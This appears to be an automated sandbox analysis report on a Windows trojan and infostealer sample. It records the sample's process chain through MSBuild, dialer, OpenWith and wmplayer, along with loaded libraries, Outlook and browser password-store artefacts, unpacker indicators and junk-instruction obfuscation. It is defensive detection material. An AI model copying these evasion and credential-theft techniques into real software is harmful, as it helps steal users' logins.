Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/0@1/2

Source: C:\Program Files\Windows Media Player\wmplayer.exe

Code function: 16_2_000002034328262C CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread,

16_2_000002034328262C

Source: C:\Windows\SysWOW64\dialer.exe

Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a63dd526-0b01-49db-ba4f-0abb4644ea93

Jump to behavior

Source: nF54KOU30R.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\nF54KOU30R.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000F.00000003.2075945157.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076104361.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076270773.000001F0D7610000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: nF54KOU30R.exe	ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe	Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\nF54KOU30R.exe "C:\Users\user\Desktop\nF54KOU30R.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 552
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1864
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Section loaded: certmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\nF54KOU30R.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source: nF54KOU30R.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: nF54KOU30R.exe

Static file information: File size 5007872 > 1048576

Source: nF54KOU30R.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x489800

Source: nF54KOU30R.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: nF54KOU30R.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs	.Net Code: CoreMain

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03D6FF22 push edi; iretd	0_3_03D6FF2D
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03D68964 push ebx; retf	0_3_03D68965
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03D6750E push ds; iretd	0_3_03D67517
Source: C:\Users\user\Desktop\nF54KOU30R.exe	Code function: 0_3_03D694E9 push cs; retf	0_3_03D69565
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D3E4E push edi; iretd	5_3_025D3E55
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D5CD2 push dword ptr [edx+ebp+3Bh]; retf	5_3_025D5CDF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D3B74 pushad ; retf	5_3_025D3B83
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D4305 push F693B671h; retf	5_3_025D430A
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D0FCE push eax; retf	5_3_025D0FCF
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D4FC8 push es; ret	5_3_025D4FC9
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D45FC push esi; ret	5_3_025D4600
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D21EF push ecx; iretd	5_3_025D21FB
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 5_3_025D21AF pushad ; ret	5_3_025D21B7
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5749D1E push esi; retf 000Ah	15_3_00007DF4E5749D1F
Source: C:\Windows\System32\OpenWith.exe	Code function: 15_3_00007DF4E5744CA0 push edx; ret	15_3_00007DF4E5744CAB
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A0DDD push edx; iretd	17_2_000001D3CF5A0DDE
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A0314 push ecx; iretd	17_2_000001D3CF5A0316
Source: C:\Windows\System32\dllhost.exe	Code function: 17_2_000001D3CF5A0922 push es; ret	17_2_000001D3CF5A0925

Source: C:\Users\user\Desktop\nF54KOU30R.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
